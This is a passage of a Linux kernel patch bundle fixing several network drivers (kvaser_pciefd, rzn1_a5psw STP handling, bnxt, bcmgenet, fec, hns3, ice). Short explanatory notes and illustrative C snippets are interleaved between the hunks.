+-		goto err_teardown_can_ctrls;
+-
+ 	err = kvaser_pciefd_reg_candev(pcie);
+ 	if (err)
+ 		goto err_free_irq;
+@@ -1856,6 +1861,8 @@ static int kvaser_pciefd_probe(struct pci_dev *pdev,
+ 	return 0;
+ 
+ err_free_irq:
++	/* Disable PCI interrupts */
++	iowrite32(0, pcie->reg_base + KVASER_PCIEFD_IEN_REG);
+ 	free_irq(pcie->pci->irq, pcie);
+ 
+ err_teardown_can_ctrls:
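
Two ordering fixes sit in the kvaser hunks above: the Rx FIFO is drained with dummy reads before DMA is enabled, and the IRQ handler is requested before any interrupt source is unmasked (with the mirror-image teardown disabling PCI interrupts before free_irq()). The drain-loop pattern, mocked here for illustration since the real code reads MMIO registers:

#include <stdio.h>
#include <stdint.h>

#define RX_NR_PACKETS_MASK 0xff

/* Mock MMIO; in the driver these are ioread32() on the SRB registers. */
static uint32_t fifo_level = 5;
static uint32_t read_nr_packets(void) { return fifo_level; }
static uint32_t pop_fifo(void) { return fifo_level ? (fifo_level--, 0xdeadu) : 0; }

int main(void)
{
	/* Read the level once, then discard that many stale packets. */
	uint32_t count = read_nr_packets() & RX_NR_PACKETS_MASK;

	while (count--)
		(void)pop_fifo();

	printf("fifo level now: %u\n", read_nr_packets()); /* 0 */
	return 0;
}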
+diff --git a/drivers/net/dsa/mv88e6xxx/port.h b/drivers/net/dsa/mv88e6xxx/port.h
+index cb04243f37c1e..a91e22d9a6cb3 100644
+--- a/drivers/net/dsa/mv88e6xxx/port.h
++++ b/drivers/net/dsa/mv88e6xxx/port.h
+@@ -276,7 +276,7 @@
+ /* Offset 0x10: Extended Port Control Command */
+ #define MV88E6393X_PORT_EPC_CMD		0x10
+ #define MV88E6393X_PORT_EPC_CMD_BUSY	0x8000
+-#define MV88E6393X_PORT_EPC_CMD_WRITE	0x0300
++#define MV88E6393X_PORT_EPC_CMD_WRITE	0x3000
+ #define MV88E6393X_PORT_EPC_INDEX_PORT_ETYPE	0x02
+ 
+ /* Offset 0x11: Extended Port Control Data */
+diff --git a/drivers/net/dsa/rzn1_a5psw.c b/drivers/net/dsa/rzn1_a5psw.c
+index ed413d555beca..790e177e2aef6 100644
+--- a/drivers/net/dsa/rzn1_a5psw.c
++++ b/drivers/net/dsa/rzn1_a5psw.c
+@@ -120,6 +120,22 @@ static void a5psw_port_mgmtfwd_set(struct a5psw *a5psw, int port, bool enable)
+ 	a5psw_port_pattern_set(a5psw, port, A5PSW_PATTERN_MGMTFWD, enable);
+ }
+ 
++static void a5psw_port_tx_enable(struct a5psw *a5psw, int port, bool enable)
++{
++	u32 mask = A5PSW_PORT_ENA_TX(port);
++	u32 reg = enable ? mask : 0;
++
++	/* Even though the port TX is disabled through TXENA bit in the
++	 * PORT_ENA register, it can still send BPDUs. This depends on the tag
++	 * configuration added when sending packets from the CPU port to the
++	 * switch port. Indeed, when using forced forwarding without filtering,
++	 * even disabled ports will be able to send packets that are tagged.
++	 * This allows to implement STP support when ports are in a state where
++	 * forwarding traffic should be stopped but BPDUs should still be sent.
++	 */
++	a5psw_reg_rmw(a5psw, A5PSW_PORT_ENA, mask, reg);
++}
++
+ static void a5psw_port_enable_set(struct a5psw *a5psw, int port, bool enable)
+ {
+ 	u32 port_ena = 0;
+@@ -292,6 +308,22 @@ static int a5psw_set_ageing_time(struct dsa_switch *ds, unsigned int msecs)
+ 	return 0;
+ }
+ 
++static void a5psw_port_learning_set(struct a5psw *a5psw, int port, bool learn)
++{
++	u32 mask = A5PSW_INPUT_LEARN_DIS(port);
++	u32 reg = !learn ? mask : 0;
++
++	a5psw_reg_rmw(a5psw, A5PSW_INPUT_LEARN, mask, reg);
++}
++
++static void a5psw_port_rx_block_set(struct a5psw *a5psw, int port, bool block)
++{
++	u32 mask = A5PSW_INPUT_LEARN_BLOCK(port);
++	u32 reg = block ? mask : 0;
++
++	a5psw_reg_rmw(a5psw, A5PSW_INPUT_LEARN, mask, reg);
++}
++
+ static void a5psw_flooding_set_resolution(struct a5psw *a5psw, int port,
+ 					  bool set)
+ {
+@@ -308,6 +340,14 @@ static void a5psw_flooding_set_resolution(struct a5psw *a5psw, int port,
+ 		a5psw_reg_writel(a5psw, offsets[i], a5psw->bridged_ports);
+ }
+ 
++static void a5psw_port_set_standalone(struct a5psw *a5psw, int port,
++				      bool standalone)
++{
++	a5psw_port_learning_set(a5psw, port, !standalone);
++	a5psw_flooding_set_resolution(a5psw, port, !standalone);
++	a5psw_port_mgmtfwd_set(a5psw, port, standalone);
++}
++
+ static int a5psw_port_bridge_join(struct dsa_switch *ds, int port,
+ 				  struct dsa_bridge bridge,
+ 				  bool *tx_fwd_offload,
+@@ -323,8 +363,7 @@ static int a5psw_port_bridge_join(struct dsa_switch *ds, int port,
+ 	}
+ 
+ 	a5psw->br_dev = bridge.dev;
+-	a5psw_flooding_set_resolution(a5psw, port, true);
+-	a5psw_port_mgmtfwd_set(a5psw, port, false);
++	a5psw_port_set_standalone(a5psw, port, false);
+ 
+ 	return 0;
+ }
+@@ -334,8 +373,7 @@ static void a5psw_port_bridge_leave(struct dsa_switch *ds, int port,
+ {
+ 	struct a5psw *a5psw = ds->priv;
+ 
+-	a5psw_flooding_set_resolution(a5psw, port, false);
+-	a5psw_port_mgmtfwd_set(a5psw, port, true);
++	a5psw_port_set_standalone(a5psw, port, true);
+ 
+ 	/* No more ports bridged */
+ 	if (a5psw->bridged_ports == BIT(A5PSW_CPU_PORT))
+@@ -344,28 +382,35 @@ static void a5psw_port_bridge_leave(struct dsa_switch *ds, int port,
+ 
+ static void a5psw_port_stp_state_set(struct dsa_switch *ds, int port, u8 state)
+ {
+-	u32 mask = A5PSW_INPUT_LEARN_DIS(port) | A5PSW_INPUT_LEARN_BLOCK(port);
++	bool learning_enabled, rx_enabled, tx_enabled;
+ 	struct a5psw *a5psw = ds->priv;
+-	u32 reg = 0;
+ 
+ 	switch (state) {
+ 	case BR_STATE_DISABLED:
+ 	case BR_STATE_BLOCKING:
+-		reg |= A5PSW_INPUT_LEARN_DIS(port);
+-		reg |= A5PSW_INPUT_LEARN_BLOCK(port);
+-		break;
+ 	case BR_STATE_LISTENING:
+-		reg |= A5PSW_INPUT_LEARN_DIS(port);
++		rx_enabled = false;
++		tx_enabled = false;
++		learning_enabled = false;
+ 		break;
+ 	case BR_STATE_LEARNING:
+-		reg |= A5PSW_INPUT_LEARN_BLOCK(port);
++		rx_enabled = false;
++		tx_enabled = false;
++		learning_enabled = true;
+ 		break;
+ 	case BR_STATE_FORWARDING:
+-	default:
++		rx_enabled = true;
++		tx_enabled = true;
++		learning_enabled = true;
+ 		break;
++	default:
++		dev_err(ds->dev, "invalid STP state: %d\n", state);
++		return;
+ 	}
+ 
+-	a5psw_reg_rmw(a5psw, A5PSW_INPUT_LEARN, mask, reg);
++	a5psw_port_learning_set(a5psw, port, learning_enabled);
++	a5psw_port_rx_block_set(a5psw, port, !rx_enabled);
++	a5psw_port_tx_enable(a5psw, port, tx_enabled);
+ }
+ 
+ static void a5psw_port_fast_age(struct dsa_switch *ds, int port)
+@@ -673,7 +718,7 @@ static int a5psw_setup(struct dsa_switch *ds)
+ 	}
+ 
+ 	/* Configure management port */
+-	reg = A5PSW_CPU_PORT | A5PSW_MGMT_CFG_DISCARD;
++	reg = A5PSW_CPU_PORT | A5PSW_MGMT_CFG_ENABLE;
+ 	a5psw_reg_writel(a5psw, A5PSW_MGMT_CFG, reg);
+ 
+ 	/* Set pattern 0 to forward all frame to mgmt port */
+@@ -722,13 +767,15 @@ static int a5psw_setup(struct dsa_switch *ds)
+ 		if (dsa_port_is_unused(dp))
+ 			continue;
+ 
+-		/* Enable egress flooding for CPU port */
+-		if (dsa_port_is_cpu(dp))
++		/* Enable egress flooding and learning for CPU port */
++		if (dsa_port_is_cpu(dp)) {
+ 			a5psw_flooding_set_resolution(a5psw, port, true);
++			a5psw_port_learning_set(a5psw, port, true);
++		}
+ 
+-		/* Enable management forward only for user ports */
++		/* Enable standalone mode for user ports */
+ 		if (dsa_port_is_user(dp))
+-			a5psw_port_mgmtfwd_set(a5psw, port, true);
++			a5psw_port_set_standalone(a5psw, port, true);
+ 	}
+ 
+ 	return 0;
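
The STP rework above decomposes each bridge state into three independent controls: address learning, RX blocking, and the new per-port TX enable (which, per the comment in the hunk, still lets tagged BPDUs from the CPU port out). Viewed as a table, the mapping that the switch statement implements is:

#include <linux/if_bridge.h>
#include <linux/types.h>

/* Equivalent table view of the new switch; the driver itself keeps the
 * switch form, this is only a restatement.
 */
struct demo_stp_cfg { bool learn, rx, tx; };

static const struct demo_stp_cfg demo_stp_map[] = {
	[BR_STATE_DISABLED]   = { .learn = false, .rx = false, .tx = false },
	[BR_STATE_BLOCKING]   = { .learn = false, .rx = false, .tx = false },
	[BR_STATE_LISTENING]  = { .learn = false, .rx = false, .tx = false },
	[BR_STATE_LEARNING]   = { .learn = true,  .rx = false, .tx = false },
	[BR_STATE_FORWARDING] = { .learn = true,  .rx = true,  .tx = true  },
};
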
+diff --git a/drivers/net/dsa/rzn1_a5psw.h b/drivers/net/dsa/rzn1_a5psw.h
+index c67abd49c013d..b869192eef3f7 100644
+--- a/drivers/net/dsa/rzn1_a5psw.h
++++ b/drivers/net/dsa/rzn1_a5psw.h
+@@ -19,6 +19,7 @@
+ #define A5PSW_PORT_OFFSET(port)		(0x400 * (port))
+ 
+ #define A5PSW_PORT_ENA			0x8
++#define A5PSW_PORT_ENA_TX(port)		BIT(port)
+ #define A5PSW_PORT_ENA_RX_SHIFT		16
+ #define A5PSW_PORT_ENA_TX_RX(port)	(BIT((port) + A5PSW_PORT_ENA_RX_SHIFT) | \
+ 					 BIT(port))
+@@ -36,7 +37,7 @@
+ #define A5PSW_INPUT_LEARN_BLOCK(p)	BIT(p)
+ 
+ #define A5PSW_MGMT_CFG			0x20
+-#define A5PSW_MGMT_CFG_DISCARD		BIT(7)
++#define A5PSW_MGMT_CFG_ENABLE		BIT(6)
+ 
+ #define A5PSW_MODE_CFG			0x24
+ #define A5PSW_MODE_STATS_RESET		BIT(31)
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+index 01b973bc509f5..b2d531e014c57 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+@@ -2822,7 +2822,7 @@ static int bnxt_get_nvram_directory(struct net_device *dev, u32 len, u8 *data)
+ 	if (rc)
+ 		return rc;
+ 
+-	buflen = dir_entries * entry_length;
++	buflen = mul_u32_u32(dir_entries, entry_length);
+ 	buf = hwrm_req_dma_slice(bp, req, buflen, &dma_handle);
+ 	if (!buf) {
+ 		hwrm_req_drop(bp, req);
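
The bnxt change guards a size computation: dir_entries and entry_length are both device-reported 32-bit values, and their plain product wraps at 2^32 before ever reaching buflen. mul_u32_u32() performs the multiply in 64 bits. A toy illustration with deliberately large, hypothetical inputs:

#include <linux/math64.h>
#include <linux/types.h>

static u64 demo_buflen(u32 dir_entries, u32 entry_length)
{
	/* With dir_entries = entry_length = 0x10000 (hypothetical), the
	 * plain u32 product wraps to 0; mul_u32_u32() yields 0x100000000.
	 */
	return mul_u32_u32(dir_entries, entry_length);
}
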
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmgenet.c b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+index f679ed54b3ef2..4da2becfa950c 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmgenet.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+@@ -3445,7 +3445,7 @@ err_clk_disable:
+ 	return ret;
+ }
+ 
+-static void bcmgenet_netif_stop(struct net_device *dev)
++static void bcmgenet_netif_stop(struct net_device *dev, bool stop_phy)
+ {
+ 	struct bcmgenet_priv *priv = netdev_priv(dev);
+ 
+@@ -3460,7 +3460,8 @@ static void bcmgenet_netif_stop(struct net_device *dev)
+ 	/* Disable MAC transmit. TX DMA disabled must be done before this */
+ 	umac_enable_set(priv, CMD_TX_EN, false);
+ 
+-	phy_stop(dev->phydev);
++	if (stop_phy)
++		phy_stop(dev->phydev);
+ 	bcmgenet_disable_rx_napi(priv);
+ 	bcmgenet_intr_disable(priv);
+ 
+@@ -3481,7 +3482,7 @@ static int bcmgenet_close(struct net_device *dev)
+ 
+ 	netif_dbg(priv, ifdown, dev, "bcmgenet_close\n");
+ 
+-	bcmgenet_netif_stop(dev);
++	bcmgenet_netif_stop(dev, false);
+ 
+ 	/* Really kill the PHY state machine and disconnect from it */
+ 	phy_disconnect(dev->phydev);
+@@ -4299,7 +4300,7 @@ static int bcmgenet_suspend(struct device *d)
+ 
+ 	netif_device_detach(dev);
+ 
+-	bcmgenet_netif_stop(dev);
++	bcmgenet_netif_stop(dev, true);
+ 
+ 	if (!device_may_wakeup(d))
+ 		phy_suspend(dev->phydev);
+diff --git a/drivers/net/ethernet/freescale/fec_main.c b/drivers/net/ethernet/freescale/fec_main.c
+index 6f914180f4797..33226a22d8a4a 100644
+--- a/drivers/net/ethernet/freescale/fec_main.c
++++ b/drivers/net/ethernet/freescale/fec_main.c
+@@ -4168,9 +4168,11 @@ fec_drv_remove(struct platform_device *pdev)
+ 	struct device_node *np = pdev->dev.of_node;
+ 	int ret;
+ 
+-	ret = pm_runtime_resume_and_get(&pdev->dev);
++	ret = pm_runtime_get_sync(&pdev->dev);
+ 	if (ret < 0)
+-		return ret;
++		dev_err(&pdev->dev,
++			"Failed to resume device in remove callback (%pe)\n",
++			ERR_PTR(ret));
+ 
+ 	cancel_work_sync(&fep->tx_timeout_work);
+ 	fec_ptp_stop(pdev);
+@@ -4183,8 +4185,13 @@ fec_drv_remove(struct platform_device *pdev)
+ 		of_phy_deregister_fixed_link(np);
+ 	of_node_put(fep->phy_node);
+ 
+-	clk_disable_unprepare(fep->clk_ahb);
+-	clk_disable_unprepare(fep->clk_ipg);
++	/* After pm_runtime_get_sync() failed, the clks are still off, so skip
++	 * disabling them again.
++	 */
++	if (ret >= 0) {
++		clk_disable_unprepare(fep->clk_ahb);
++		clk_disable_unprepare(fep->clk_ipg);
++	}
+ 	pm_runtime_put_noidle(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+ 
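The fec_drv_remove() change follows the driver-model rule that a remove callback cannot abort: a failed runtime resume is logged and teardown continues, and the resume result is remembered so clk_disable_unprepare() only runs when the clocks actually came back on. Condensed to a sketch, with demo_teardown()/demo_clk_disable() as hypothetical stand-ins:

#include <linux/platform_device.h>
#include <linux/pm_runtime.h>

void demo_teardown(struct platform_device *pdev);	/* hypothetical */
void demo_clk_disable(struct platform_device *pdev);	/* hypothetical */

static int demo_remove(struct platform_device *pdev)
{
	int ret = pm_runtime_get_sync(&pdev->dev);

	if (ret < 0)
		dev_err(&pdev->dev, "resume failed in remove (%pe)\n",
			ERR_PTR(ret));

	demo_teardown(pdev);		/* always runs */

	if (ret >= 0)			/* clocks are on only on success */
		demo_clk_disable(pdev);

	pm_runtime_put_noidle(&pdev->dev);
	pm_runtime_disable(&pdev->dev);
	return 0;
}
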
+diff --git a/drivers/net/ethernet/google/gve/gve_main.c b/drivers/net/ethernet/google/gve/gve_main.c
+index d3e3ac242bfc3..2e5e0a8872704 100644
+--- a/drivers/net/ethernet/google/gve/gve_main.c
++++ b/drivers/net/ethernet/google/gve/gve_main.c
+@@ -239,19 +239,6 @@ static int gve_napi_poll_dqo(struct napi_struct *napi, int budget)
+ 	bool reschedule = false;
+ 	int work_done = 0;
+ 
+-	/* Clear PCI MSI-X Pending Bit Array (PBA)
+-	 *
+-	 * This bit is set if an interrupt event occurs while the vector is
+-	 * masked. If this bit is set and we reenable the interrupt, it will
+-	 * fire again. Since we're just about to poll the queue state, we don't
+-	 * need it to fire again.
+-	 *
+-	 * Under high softirq load, it's possible that the interrupt condition
+-	 * is triggered twice before we got the chance to process it.
+-	 */
+-	gve_write_irq_doorbell_dqo(priv, block,
+-				   GVE_ITR_NO_UPDATE_DQO | GVE_ITR_CLEAR_PBA_BIT_DQO);
+-
+ 	if (block->tx)
+ 		reschedule |= gve_tx_poll_dqo(block, /*do_clean=*/true);
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.c b/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.c
+index f671a63cecde4..c797d54f98caa 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.c
+@@ -330,9 +330,25 @@ static int hclge_comm_cmd_csq_done(struct hclge_comm_hw *hw)
+ 	return head == hw->cmq.csq.next_to_use;
+ }
+ 
+-static void hclge_comm_wait_for_resp(struct hclge_comm_hw *hw,
++static u32 hclge_get_cmdq_tx_timeout(u16 opcode, u32 tx_timeout)
++{
++	static const struct hclge_cmdq_tx_timeout_map cmdq_tx_timeout_map[] = {
++		{HCLGE_OPC_CFG_RST_TRIGGER, HCLGE_COMM_CMDQ_TX_TIMEOUT_500MS},
++	};
++	u32 i;
++
++	for (i = 0; i < ARRAY_SIZE(cmdq_tx_timeout_map); i++)
++		if (cmdq_tx_timeout_map[i].opcode == opcode)
++			return cmdq_tx_timeout_map[i].tx_timeout;
++
++	return tx_timeout;
++}
++
++static void hclge_comm_wait_for_resp(struct hclge_comm_hw *hw, u16 opcode,
+ 				     bool *is_completed)
+ {
++	u32 cmdq_tx_timeout = hclge_get_cmdq_tx_timeout(opcode,
++							hw->cmq.tx_timeout);
+ 	u32 timeout = 0;
+ 
+ 	do {
+@@ -342,7 +358,7 @@ static void hclge_comm_wait_for_resp(struct hclge_comm_hw *hw,
+ 		}
+ 		udelay(1);
+ 		timeout++;
+-	} while (timeout < hw->cmq.tx_timeout);
++	} while (timeout < cmdq_tx_timeout);
+ }
+ 
+ static int hclge_comm_cmd_convert_err_code(u16 desc_ret)
+@@ -406,7 +422,8 @@ static int hclge_comm_cmd_check_result(struct hclge_comm_hw *hw,
+ 	 * if multi descriptors to be sent, use the first one to check
+ 	 */
+ 	if (HCLGE_COMM_SEND_SYNC(le16_to_cpu(desc->flag)))
+-		hclge_comm_wait_for_resp(hw, &is_completed);
++		hclge_comm_wait_for_resp(hw, le16_to_cpu(desc->opcode),
++					 &is_completed);
+ 
+ 	if (!is_completed)
+ 		ret = -EBADE;
+@@ -528,7 +545,7 @@ int hclge_comm_cmd_queue_init(struct pci_dev *pdev, struct hclge_comm_hw *hw)
+ 	cmdq->crq.desc_num = HCLGE_COMM_NIC_CMQ_DESC_NUM;
+ 
+ 	/* Setup Tx write back timeout */
+-	cmdq->tx_timeout = HCLGE_COMM_CMDQ_TX_TIMEOUT;
++	cmdq->tx_timeout = HCLGE_COMM_CMDQ_TX_TIMEOUT_DEFAULT;
+ 
+ 	/* Setup queue rings */
+ 	ret = hclge_comm_alloc_cmd_queue(hw, HCLGE_COMM_TYPE_CSQ);
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.h b/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.h
+index b1f9383b418f4..2b2928c6dccfc 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.h
+@@ -54,7 +54,8 @@
+ #define HCLGE_COMM_NIC_SW_RST_RDY		BIT(HCLGE_COMM_NIC_SW_RST_RDY_B)
+ #define HCLGE_COMM_NIC_CMQ_DESC_NUM_S		3
+ #define HCLGE_COMM_NIC_CMQ_DESC_NUM		1024
+-#define HCLGE_COMM_CMDQ_TX_TIMEOUT		30000
++#define HCLGE_COMM_CMDQ_TX_TIMEOUT_DEFAULT	30000
++#define HCLGE_COMM_CMDQ_TX_TIMEOUT_500MS	500000
+ 
+ enum hclge_opcode_type {
+ 	/* Generic commands */
+@@ -357,6 +358,11 @@ struct hclge_comm_caps_bit_map {
+ 	u16 local_bit;
+ };
+ 
++struct hclge_cmdq_tx_timeout_map {
++	u32 opcode;
++	u32 tx_timeout;
++};
++
+ struct hclge_comm_firmware_compat_cmd {
+ 	__le32 compat;
+ 	u8 rsv[20];
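
hclge_get_cmdq_tx_timeout() above converts the single global command timeout into a per-opcode override: a linear scan of a tiny map with a fallback to the queue default, so slow commands get longer waits without touching the fast path. Extending it is a one-row change; the commented-out entry below is a made-up placeholder, not a real HCLGE opcode:

static const struct hclge_cmdq_tx_timeout_map demo_timeout_map[] = {
	{HCLGE_OPC_CFG_RST_TRIGGER, HCLGE_COMM_CMDQ_TX_TIMEOUT_500MS},
	/* {HCLGE_OPC_DEMO_SLOW_CMD, HCLGE_COMM_CMDQ_TX_TIMEOUT_500MS}, */
};
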
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
+index 66feb23f7b7b6..bcccd82a2620f 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
+@@ -130,7 +130,7 @@ static struct hns3_dbg_cmd_info hns3_dbg_cmd[] = {
+ 		.name = "tx_bd_queue",
+ 		.cmd = HNAE3_DBG_CMD_TX_BD,
+ 		.dentry = HNS3_DBG_DENTRY_TX_BD,
+-		.buf_len = HNS3_DBG_READ_LEN_4MB,
++		.buf_len = HNS3_DBG_READ_LEN_5MB,
+ 		.init = hns3_dbg_bd_file_init,
+ 	},
+ 	{
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.h b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.h
+index 97578eabb7d8b..4a5ef8a90a104 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.h
+@@ -10,6 +10,7 @@
+ #define HNS3_DBG_READ_LEN_128KB	0x20000
+ #define HNS3_DBG_READ_LEN_1MB	0x100000
+ #define HNS3_DBG_READ_LEN_4MB	0x400000
++#define HNS3_DBG_READ_LEN_5MB	0x500000
+ #define HNS3_DBG_WRITE_LEN	1024
+ 
+ #define HNS3_DBG_DATA_STR_LEN	32
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index 07ad5f35219e2..50e956d6c3b25 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -8053,12 +8053,15 @@ static void hclge_ae_stop(struct hnae3_handle *handle)
+ 	/* If it is not PF reset or FLR, the firmware will disable the MAC,
+ 	 * so it only need to stop phy here.
+ 	 */
+-	if (test_bit(HCLGE_STATE_RST_HANDLING, &hdev->state) &&
+-	    hdev->reset_type != HNAE3_FUNC_RESET &&
+-	    hdev->reset_type != HNAE3_FLR_RESET) {
+-		hclge_mac_stop_phy(hdev);
+-		hclge_update_link_status(hdev);
+-		return;
++	if (test_bit(HCLGE_STATE_RST_HANDLING, &hdev->state)) {
++		hclge_pfc_pause_en_cfg(hdev, HCLGE_PFC_TX_RX_DISABLE,
++				       HCLGE_PFC_DISABLE);
++		if (hdev->reset_type != HNAE3_FUNC_RESET &&
++		    hdev->reset_type != HNAE3_FLR_RESET) {
++			hclge_mac_stop_phy(hdev);
++			hclge_update_link_status(hdev);
++			return;
++		}
+ 	}
+ 
+ 	hclge_reset_tqp(handle);
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c
+index 4a33f65190e2b..922c0da3660c7 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c
+@@ -171,8 +171,8 @@ int hclge_mac_pause_en_cfg(struct hclge_dev *hdev, bool tx, bool rx)
+ 	return hclge_cmd_send(&hdev->hw, &desc, 1);
+ }
+ 
+-static int hclge_pfc_pause_en_cfg(struct hclge_dev *hdev, u8 tx_rx_bitmap,
+-				  u8 pfc_bitmap)
++int hclge_pfc_pause_en_cfg(struct hclge_dev *hdev, u8 tx_rx_bitmap,
++			   u8 pfc_bitmap)
+ {
+ 	struct hclge_desc desc;
+ 	struct hclge_pfc_en_cmd *pfc = (struct hclge_pfc_en_cmd *)desc.data;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.h b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.h
+index 68f28a98e380b..dd6f1fd486cf2 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.h
+@@ -164,6 +164,9 @@ struct hclge_bp_to_qs_map_cmd {
+ 	u32 rsvd1;
+ };
+ 
++#define HCLGE_PFC_DISABLE	0
++#define HCLGE_PFC_TX_RX_DISABLE	0
++
+ struct hclge_pfc_en_cmd {
+ 	u8 tx_rx_en_bitmap;
+ 	u8 pri_en_bitmap;
+@@ -235,6 +238,8 @@ void hclge_tm_schd_info_update(struct hclge_dev *hdev, u8 num_tc);
+ void hclge_tm_pfc_info_update(struct hclge_dev *hdev);
+ int hclge_tm_dwrr_cfg(struct hclge_dev *hdev);
+ int hclge_tm_init_hw(struct hclge_dev *hdev, bool init);
++int hclge_pfc_pause_en_cfg(struct hclge_dev *hdev, u8 tx_rx_bitmap,
++			   u8 pfc_bitmap);
+ int hclge_mac_pause_en_cfg(struct hclge_dev *hdev, bool tx, bool rx);
+ int hclge_pause_addr_cfg(struct hclge_dev *hdev, const u8 *mac_addr);
+ void hclge_pfc_rx_stats_get(struct hclge_dev *hdev, u64 *stats);
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+index e84e5be8e59ed..b1b14850e958f 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+@@ -1436,7 +1436,10 @@ static int hclgevf_reset_wait(struct hclgevf_dev *hdev)
+ 	 * might happen in case reset assertion was made by PF. Yes, this also
+ 	 * means we might end up waiting bit more even for VF reset.
+ 	 */
+-	msleep(5000);
++	if (hdev->reset_type == HNAE3_VF_FULL_RESET)
++		msleep(5000);
++	else
++		msleep(500);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index cfc57cfc46e42..6a50f8ba3940c 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -573,7 +573,7 @@ ice_prepare_for_reset(struct ice_pf *pf, enum ice_reset_req reset_type)
+ 	/* Disable VFs until reset is completed */
+ 	mutex_lock(&pf->vfs.table_lock);
+ 	ice_for_each_vf(pf, bkt, vf)
+-		ice_set_vf_state_qs_dis(vf);
++		ice_set_vf_state_dis(vf);
+ 	mutex_unlock(&pf->vfs.table_lock);
+ 
+ 	if (ice_is_eswitch_mode_switchdev(pf)) {
+diff --git a/drivers/net/ethernet/intel/ice/ice_sriov.c b/drivers/net/ethernet/intel/ice/ice_sriov.c
+index b3849bc3d4fc6..b8c31bf721ad1 100644
+--- a/drivers/net/ethernet/intel/ice/ice_sriov.c
++++ b/drivers/net/ethernet/intel/ice/ice_sriov.c
+@@ -696,6 +696,21 @@ static void ice_sriov_free_vf(struct ice_vf *vf)
+ 	kfree_rcu(vf, rcu);
+ }
+ 
++/**
++ * ice_sriov_clear_reset_state - clears VF Reset status register
++ * @vf: the vf to configure
++ */
++static void ice_sriov_clear_reset_state(struct ice_vf *vf)
++{
++	struct ice_hw *hw = &vf->pf->hw;
++
++	/* Clear the reset status register so that VF immediately sees that
++	 * the device is resetting, even if hardware hasn't yet gotten around
++	 * to clearing VFGEN_RSTAT for us.
++	 */
++	wr32(hw, VFGEN_RSTAT(vf->vf_id), VIRTCHNL_VFR_INPROGRESS);
++}
++
+ /**
+  * ice_sriov_clear_mbx_register - clears SRIOV VF's mailbox registers
+  * @vf: the vf to configure
+@@ -835,6 +850,7 @@ static void ice_sriov_post_vsi_rebuild(struct ice_vf *vf)
+ static const struct ice_vf_ops ice_sriov_vf_ops = {
+ 	.reset_type = ICE_VF_RESET,
+ 	.free = ice_sriov_free_vf,
++	.clear_reset_state = ice_sriov_clear_reset_state,
+ 	.clear_mbx_register = ice_sriov_clear_mbx_register,
+ 	.trigger_reset_register = ice_sriov_trigger_reset_register,
+ 	.poll_reset_status = ice_sriov_poll_reset_status,
+@@ -1224,7 +1240,7 @@ int ice_set_vf_spoofchk(struct net_device *netdev, int vf_id, bool ena)
+ 	if (!vf)
+ 		return -EINVAL;
+ 
+-	ret = ice_check_vf_ready_for_cfg(vf);
++	ret = ice_check_vf_ready_for_reset(vf);
+ 	if (ret)
+ 		goto out_put_vf;
+ 
+@@ -1339,7 +1355,7 @@ int ice_set_vf_mac(struct net_device *netdev, int vf_id, u8 *mac)
+ 		goto out_put_vf;
+ 	}
+ 
+-	ret = ice_check_vf_ready_for_cfg(vf);
++	ret = ice_check_vf_ready_for_reset(vf);
+ 	if (ret)
+ 		goto out_put_vf;
+ 
+@@ -1393,7 +1409,7 @@ int ice_set_vf_trust(struct net_device *netdev, int vf_id, bool trusted)
